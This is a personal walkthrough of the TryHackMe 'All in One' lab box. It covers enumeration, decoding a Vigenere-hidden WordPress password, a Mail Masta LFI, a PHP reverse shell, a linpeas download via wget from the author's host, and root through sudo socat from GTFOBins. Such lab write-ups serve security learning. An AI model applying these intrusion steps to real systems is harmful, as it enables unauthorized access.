All In One

So I this is my first real attempt as doing a box with no hints or walk throughs. Sadly I have looked ay walk throughs for every box. Even if just for a little single piece of information. The total time it took me to root this machine was about 7 hours. Once I got a shell the rest was easy. Here is my walk though All in One on try hack me.

Nmap Results
GoBuster Results
Nikto Results

These are normally what I run first. I found three things right away that stood out. Directories for /wordpress and /hackathons and of course the low hanging fruit FTP with anonymous. Which FTP ended up being a dead end as no files were there. I was hoping for a text file with a clue of some kind, no luck.

The next option was /Hackathons. I went there and way greeted with a lovely message. Damn how much I hate the smell of Vinegar !!! . So I checked the source and got my first nugget.

<!– Dvc W@iyur@123 –>
<!– KeepGoing –>

So my knee jerk reaction was woot a password. What the password was for not sure. WordPress, ftp, or SSH Which I tried them in all. No luck. so I moved on to looking at work press a bit more. And did a WPScan

So first thing I did was check the verison on WP 5.5.1 I believe. Which really came up with nothing. Then followed up with reflex-gallery. Which there was a vuln for version 3.1.3 for file upload. I wasted a good amount of time on that one. Really nothing came of it though. I came up with the thought that the issue was fixed in this version. So ran with the LFI on Mail Masta. That did work and I found the /etc/passwd file.

But the issue I had was I had no idea what files I was looking for. And as a low level user chances are I could not access them anyway. But I did confirm that elyana was also an account. Back to word press

I thought I would try Elyana as a user and the password I thought I had

Password did not work but information showed that was a user. Checked it against another user and got a different error message. Which means I could brute force with Wfuzz but that would take a lot of time.

Now I was stuck and went to bed. The next day I was looking at my notes and saw Dvc W@iyur@123 looking at me and thought I wonder if it is a cipher. The @’s and space really through me off. I might have seen it sooner if it was not for that. So I went to my 19th favorite website dcode.fr and ran a cipher identifier.

And I never felt like I missed the biggest clue. I hate the smell of Vigenere!!!

So I ran a Vigenere cipher. I was really excited almost shaking I finally get to log into something. That did not last.

H@eres@123 I mean really is that the password. Well chance are it is not on a list. So I tried again, wordpress,ftp,ssh no luck which really I kinda thought. I am actually certified encryption specialist through ECES. Yeah I slipped that flex in. But My mind went straight to I wonder if there is a key for it. Going back to my note I saw
KeepGoing which at the time I just thought the maker of the box was trolling us. But I tried it as a key. This time was much better.
Try H@ckme@123 which would you believe it! It worked for wordpress. For me it is always the first foot hold I have a hard time with. My goto is always changing a PHP of an extension to my favorite reverse shell. Pentest Monkey.

Before I upload it I need to start my netcat

And it worked!! I have a shell. www-data but ill take it!!. So the first two thing I always do is run sudo -l to see if I can run anything as sudo which I could not. So LINPEAS to save the day. So i cd /tmp

Started my python server. And Wget http://mytunip/linpeas.sh. A quick Chmod +x later we are off and running

A lot of options. But some I needed to be a different user. Now really I should have checked the home directory for Elyana first. But I finally got around to it. The home directory had two files one users.txt and the other hint.txt So I tried to cat users.txt but I could not. So I ran cat against hint.txt

Find the hidden password. Well that is easy enough. I ran find against elyana and this showed up.

Now that is a file I was not expecting to see there.

opened up and found this.

Okay finding the password was pretty easy. So I SSH’d into the computer with the new found information. And ran sudo -l and got this.

socat? The one linpeas flagged as a Orange and red? Game over. Jumped on gtfobin.com and grabbed this
Ran it and done.

Now for the finally bits. Went to root got the key and got the key for the user.

Crap that does not look right. But I might know how to make it right. So I popped onto cyber chef and guess that was base64 finished it.

So there is a few way to do this box. I found at least two other ways but went for the easy win. It basically took over 6 hours for me to get a low level shell. and almost an hour more to get root. Try Harder!! I hate that phrase. Maybe instead we should say Don’t give up!!